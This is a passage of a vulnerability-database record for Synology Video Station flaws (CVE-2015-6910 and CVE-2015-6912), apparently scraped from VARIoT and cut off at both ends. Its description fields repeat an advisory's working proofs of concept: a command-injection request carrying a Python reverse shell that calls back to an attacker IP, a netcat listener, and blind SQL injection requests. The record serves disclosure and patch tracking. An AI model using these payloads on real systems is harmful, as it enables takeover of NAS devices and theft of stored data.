Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\n\nSQL injection vulnerability in watchstatus.cgi\n\nA (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. \n\nProof of concept\n\nPOST /webapi/VideoStation/watchstatus.cgi HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: Lq6mE9ANV2egU\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 80\nCookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n \nid=15076178770%20or%204864%3d4864--%20\u0026position=10.05\u0026api=SYNO.VideoStation.WatchStatus\u0026method=setinfo\u0026version=1\n\nIt should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. \nProof of concept\n\nPOST /webapi/VideoStation/audiotrack.cgi HTTP/1.1\nContent-Length: 294\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: 7IKJdJMa8cutE\nHost: \u003chostname\u003e:5000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/5.0\nAccept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710\n \nid=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29\u0026api=SYNO.VideoStation.AudioTrack\u0026method=list\u0026version=1\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6910"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6910",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "133519",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-84871",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"id": "VAR-201509-0202",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-84871"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:18:04.092000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Release Notes for Video Station",
"trust": 0.8,
"url": "https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715"
},
{
"title": "Synology Product Security Advisory",
"trust": 0.8,
"url": "https://www.synology.com/en-global/support/security/Video_Station_1_5_0757"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.synology.com/en-global/releasenote/videostation?model=ds715"
},
{
"trust": 1.7,
"url": "https://www.synology.com/en-global/support/security/video_station_1_5_0757"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2015/sep/31"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html"
},
{
"trust": 1.7,
"url": "https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/536427/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6910"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6910"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-84871"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-11T00:00:00",
"db": "VULHUB",
"id": "VHN-84871"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"date": "2015-09-10T00:05:25",
"db": "PACKETSTORM",
"id": "133519"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"date": "2015-09-11T16:59:16.550000",
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-84871"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004687"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-150"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-6910"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004687"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sql injection",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-150"
}
],
"trust": 0.7
}
}
VAR-201509-0204
Vulnerability from variot - Updated: 2025-04-13 23:18Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary shell commands via shell metacharacters in the subtitle_codepage parameter to subtitle.cgi. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Synology Video Station is a video manager from Synology. The vulnerability is caused by the fact that the subtitle.cgi file does not adequately filter shell metacharacters in the 'subtitle_codepage' parameter. In addition, Video Station is affected by multiple SQL injection vulnerabilities that allows for execution of arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server.
Affected versions
These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems.
- Start netcat on attacker's system:
nc -nvlp 80
- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):
GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
SQL injection vulnerability in watchstatus.cgi
A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.
Proof of concept
POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1
It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. SQL injection vulnerability in audiotrack.cgi
A (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. Proof of concept
POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: :5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710
id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0204",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lte",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0757"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.5-0763"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.6,
"vendor": "synology",
"version": "1.5-0757"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Securify B.V., Han Sahin",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 0.1
},
"cve": "CVE-2015-6912",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2015-6912",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-84873",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6912",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6912",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-152",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-84873",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-6912",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary shell commands via shell metacharacters in the subtitle_codepage parameter to subtitle.cgi. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Synology Video Station is a video manager from Synology. The vulnerability is caused by the fact that the subtitle.cgi file does not adequately filter shell metacharacters in the \u0027subtitle_codepage\u0027 parameter. In addition, Video Station is affected by multiple\nSQL injection vulnerabilities that allows for execution of arbitrary SQL\nstatements with DBA privileges. As a result it is possible to compromise\nthe PostgreSQL database server. \n\n------------------------------------------------------------------------\nAffected versions\n------------------------------------------------------------------------\nThese issues affect Synology Video Station version up to and including\nversion 1.5-0757. The script subtitle.cgi can also be called when the \u0027public share\u0027 option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. \n\n\n- Start netcat on attacker\u0027s system:\n\nnc -nvlp 80\n\n- Submit the following request (change the IP - 192.168.1.20 - \u0026 port number - 80):\n\nGET /webapi/VideoStation/subtitle.cgi?id=193\u0026api=SYNO.VideoStation.Subtitle\u0026method=get\u0026version=2\u0026subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt\u0026subtitle_codepage=auto%26python%20-c%20\u0027import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);\u0027%26\u0026preview=false\u0026sharing_id=kSiNy0Pp HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\n\nSQL injection vulnerability in watchstatus.cgi\n\nA (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the \u0027id\u0027 parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. \n\nProof of concept\n\nPOST /webapi/VideoStation/watchstatus.cgi HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: Lq6mE9ANV2egU\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 80\nCookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n \nid=15076178770%20or%204864%3d4864--%20\u0026position=10.05\u0026api=SYNO.VideoStation.WatchStatus\u0026method=setinfo\u0026version=1\n\nIt should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. \nSQL injection vulnerability in audiotrack.cgi\n\nA (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the \u0027id\u0027 parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. \nProof of concept\n\nPOST /webapi/VideoStation/audiotrack.cgi HTTP/1.1\nContent-Length: 294\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: 7IKJdJMa8cutE\nHost: \u003chostname\u003e:5000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/5.0\nAccept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710\n \nid=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29\u0026api=SYNO.VideoStation.AudioTrack\u0026method=list\u0026version=1\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6912"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 1.89
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-84873",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38128",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6912",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "133519",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "38128",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-84873",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-6912",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"id": "VAR-201509-0204",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:18:04.061000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Release Notes for Video Station",
"trust": 0.8,
"url": "https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.synology.com/en-global/releasenote/videostation?model=ds715"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2015/sep/31"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html"
},
{
"trust": 1.8,
"url": "https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/536427/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6912"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6912"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/38128/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-84873"
},
{
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
